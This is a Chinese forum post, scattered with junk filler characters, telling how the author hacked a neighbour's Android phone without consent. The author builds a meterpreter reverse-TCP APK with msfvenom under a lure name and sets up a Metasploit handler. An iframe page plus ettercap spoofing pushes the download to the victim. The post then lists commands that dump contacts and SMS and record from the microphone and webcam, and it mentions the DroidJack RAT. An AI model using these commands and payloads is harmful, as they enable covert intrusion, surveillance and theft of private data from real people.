metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

4 \% Z( g. b3 R1 \ Q1 I" \7 x 五、msf+ettercap入侵邻居安卓手机 " b7 L, S' o A. i* I

3 q' {; P: {# k2 o, N- E 首先启动msf 9 J$ |5 A+ W* ^7 D: j3 A- `7 G

b' @- O g( z1 r# _ 先用kali生成一个安卓木马，如下命令： 7 c+ k6 _5 r. [' [

; ?' Z% l% @3 i: B: P- c Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 9 I3 q4 G! G( G) z

3 s }' b( h5 t0 ^ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 . Z; \2 ?1 j5 V$ T7 V% n; {' }+ N

, o& t( U+ O% @& p3 }' z 然后进入msf + n, w! C+ X8 G/ g3 a

. a7 I' Z: k/ d% q0 _* V4 W use exploit/multi/handler ' W& v. D; r2 Y

0 n* o' w$ [: x( f# X# W7 d' @ set payload android/meterpreter/reverse_tcp # }- z# ~, o8 `8 ^1 E3 A

" b3 ~* D( E8 q7 Z set LHOST 192.168.0.109 //ip为kaili的ip 0 |5 l0 G8 y7 N' s1 d2 F

* i' O+ ^) A, ~ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 # o0 p2 \ s3 \4 n4 s

; {9 {: T& p$ X, J$ n Exploit + I! U5 O0 [, s. J5 W

# m! P; v+ j7 g" w% j - A$ I- C' c5 ^. b( v9 B! n

# e$ y6 e9 G/ y9 m# f$ l 下面我们开启ettercap -G + x% \4 c# g+ R _

( |- s5 V6 w3 \' a2 a 我物理IP为 , f0 o: {* L' i' g

8 N( X( o+ h$ e7 Q+ b" R3 F- n 4 h6 o2 y& o8 k6 m

9 ~7 I, X7 f) x6 g( Q$ p, g 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， ! \% y7 h; w6 l/ e1 Z$ y" p

2 O! E, a" i6 ~( F" S* s 下面我们来设置一下 2 R' L7 j3 F9 R

% X b& ^, B/ F+ a M" V ! P6 X i2 _7 _2 Q6 H. B2 z

9 l3 H& H, t" v 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， ; T# t" d1 {# C: q; C

! {, P7 a5 V+ p" _ - A* {/ B* e7 d6 b+ z, a% |! N; ^

) A$ W/ J' i% G ' _% P8 W4 I& t6 {4 i

* b, h8 V# I& I$ m$ Q+ e # A' e( w7 ^3 r5 A% L

0 F4 W' X r$ d* {, B7 E& v' W. H ; u3 f+ ?6 V) e2 d9 |" G+ Z

6 X" f) K: V) L7 ?0 i( T/ v # x6 D/ ]; F/ Y* @5 J6 J

: Q& \( L* q7 ^ N! r9 [- Q 3 i# B/ T) b' Q2 G6 E9 }

* P+ z. z0 X N: D7 I 1 U$ Z* Z* C, t8 [% b L

0 ~2 s" S* K1 e4 K* T' E * }( E0 Q) r8 O, R. v

% T3 L& j( [7 l6 L/ R8 N % z% }9 u4 {# i& b' Z$ S' I

" e2 p- Y. _3 L4 a( N 2 @5 V5 T9 L* V# j2 d- F

/ U/ {, L: {) c" W3 p% E6 ]7 k / e5 i5 R9 E/ ]

2 O$ h5 h; P4 E1 `7 A - m! S F) I. ?& d$ R7 u

1 j$ V7 s, I! m5 ~. r! v* m , d# h. r. u) S4 T

# z6 `7 e9 t, n+ t5 ]( B5 ] 下面我们开始攻击 " \; ^$ @* b/ X* T: n' u

* N1 _( |6 O! R ?% E9 B& J6 [ " b: l4 h. x6 s9 N! F7 S9 V% e

1 z# m. L$ ?+ z, { @9 \ - i8 l% A( I7 i. s/ b7 c1 ^

9 o7 |+ }% j! r3 t, [ : O1 I2 M7 C/ \

) ]/ ]* l1 s' b" R 6 ~% [) K. ^6 a$ x; `, {. a5 [- r8 u

& P7 ^ d* ]2 d$ D7 ~ 6 N% Y6 g. V3 L5 P6 u

, X8 a6 i- m( D) w; Q! R) `. P, r) u" ^ 大概过了5分钟多，发现反弹成功了 / c- ^- {: q, j6 i, H! [7 g; j

! P0 N( ^- t# r2 Y; r 6 \; [2 x& W. p; w$ z

+ q5 Q. E5 {7 t1 p6 X / g2 P2 l2 g7 |. i/ U

- S* I- S8 F; Z7 G1 ^' \ # y8 K1 T) l) u% ~3 J; F" s G

! ^' e& `- m3 { ~ L- e # N2 ]5 B. ~1 P; @+ C8 B

, t1 C1 I% x7 |* X! [ * n8 D* S, O$ i# X$ `# ?* }

- ` t# v/ T( R, D( N6 y * m) s' r/ g. W( l n6 ^0 S

$ n% C) l% b! e3 Q5 i4 e6 I 9 X6 d1 E j( O8 @% t

% J: t) s% Z0 g5 s1 T6 V 执行命令 1 H( X' b# L0 e) ]1 H% K6 j& y1 [

$ {# N7 k$ F0 n0 ^5 C $ @' z+ Q( D a

# Z, Y3 Y0 q( ~, ]. a( Z dump_contacts --》这个是导出电话 2 b9 M7 _- j0 x. k+ }; ?

" J- I- z$ }* \+ u" V dump_sms --》这个是导出信息 " ]3 f# T) r( d- ]# `

; W, d& K4 T8 k9 X2 `! \7 Q3 K5 v record_mic Record audio from the default microphone for X seconds 5 v6 P6 A8 d# P/ x# d, Q6 @

* I% H1 A4 ~" y9 u webcam_chat Start a video chat , W0 o& |# N9 s, L

3 R5 ?7 G; V5 E" r8 _& b9 y, o webcam_list List webcams 6 e7 c F; ^- y% b( M2 y) f

; |6 Y/ @, T+ E6 E$ F webcam_snap Take a snapshot from the specified webcam ) _# H# z$ J" [4 n U: |! \* s

( I, L8 f1 l/ A7 a webcam_stream lay a video stream from the specified webcam / F9 M, v" r" L8 h C3 x9 E! C' b

+ n3 ^3 n# K( |( U# M $ {- Y/ B& [$ |* E: t( T2 s5 n

% N% z" |( W- ?0 w# O ) ^: O9 g: F3 x8 f

# ^0 w q: C7 }' v8 b 我们打开看一下电话薄， 5 }9 }+ u6 ^: ~# c1 k

9 X. ]# ~2 @' x2 a1 ^* J% V 1 a, a$ v0 M0 m" u* H

$ V1 I0 T6 \+ P& Y1 Q$ g# G- c 0 T! l0 `* O9 Y

/ H8 p0 e, w" F* w / m, F3 [, N8 b% w# w) Q" [

' r7 O( C0 B/ K5 b4 t4 }- [ ( [) X9 b5 `' B$ B) n4 S. P! I

5 C6 ]. G4 l2 [& V2 m" q2 Z0 I / H+ ?, a) B x& x$ N* D

+ A$ i( J. D; m # o8 ~8 s+ }. [& X6 ]& v; T: h

3 U! C& z9 i; I2 Y 我们同时欺骗成DroidJack木马，使用方法如图： + E9 B x& O( B' p& M9 h

6 y& B3 a( o W6 b: f/ m0 M* U 2 U0 x1 G# B- i+ B/ H

2 ~4 o9 F' Z' c( Q$ R+ k - i& U% g+ _) \8 B4 @) }

7 v7 z. {& y8 N, d , j) |: @( _2 h% P

9 z2 o/ T* i6 i8 y: g/ f 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 7 S3 c( M' v4 T5 Y0 O& p$ D, p5 s

2 h- l' @/ j- s8 d' j! W3 ^ - G% u) U- V) q5 K" N: R

g- M }( E6 v4 N, v7 z- ~" F & I8 [, V3 ]6 C

0 u% D$ w7 D- j$ y1 M! y+ V 3 T0 f, e: c* c7 ?

" \6 Z% H% i$ ~ : y; `( P8 Z" G* I9 K# p- k

: a! ?2 Y. V7 }% X1 d
8 p5 _, |8 Q' Z; a

		自动登录	找回密码
密码			立即注册